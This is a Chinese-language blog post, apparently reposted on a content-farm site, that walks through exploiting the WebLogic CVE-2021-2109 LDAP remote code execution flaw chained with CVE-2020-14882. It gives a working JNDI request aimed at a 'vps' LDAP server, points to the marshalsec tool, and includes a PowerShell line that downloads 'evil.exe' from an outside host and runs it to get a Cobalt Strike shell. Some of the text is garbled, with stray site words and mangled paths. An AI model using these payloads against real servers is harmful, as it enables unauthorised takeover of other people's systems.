weblogic CVE-2021-2109ldap远程代码执行漏洞的复现是怎样的


本篇文章给大家分享的是有关weblogic CVE-2021-2109ldap远程代码执行漏洞的复现是怎样的,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。参考:https://blog.csdn.net/zhlh_xt/article/details/76436807下载链接:https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.htmlhttps://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html开始安装:| Java -D64 -jar wls1036_generic.jar |
| C:OracleMiddlewareuser_projectsdomains |
设置密免费云主机域名码搭建完毕访问目标:准备工作:ldap包下载 https://github.com/RandomRobbieBF/marshalsec-jar/archive/master.zip
构造java包进行编译:Request.java如想上线CS把calc.exe修改为下载cs木马并执行命令cd ../../Windows/Temp && powershell (new-object System.Net.WebClient).DownloadFile(‘http://vps/123.jpg’,’evil.exe’) & evil.exe进行编译:注意目标环境是什么jdk就用什么jdk版本进行编译编译好class包后上传到vps开启http服务,下面放编译好的class包用下载好的marshalsec包开启ldap服务:通过burp请求:配合
CVE-2021-2109(ldap远程代码执行)和CVE-2020-14882(未授权访问)完整数据包:_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22;ldap://vps:5005/Request;AdminServer%22) |cs接收shell限制条件:目标可以出网,能够成功构造和发送包以上就是weblogic CVE-2021-2109ldap远程代码执行漏洞的复现是怎样的,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注云编程开发博客行业资讯频道。

相关推荐: linux中的文件编码如何转换

本篇内容主要讲解“linux中的文件编码如何转换”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“linux中的文件编码如何转换”吧!查看文件的编码使用 file 命令,并添加-i或–mime参数来查看一个文件的字符编…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/03 11:46
下一篇 02/03 11:47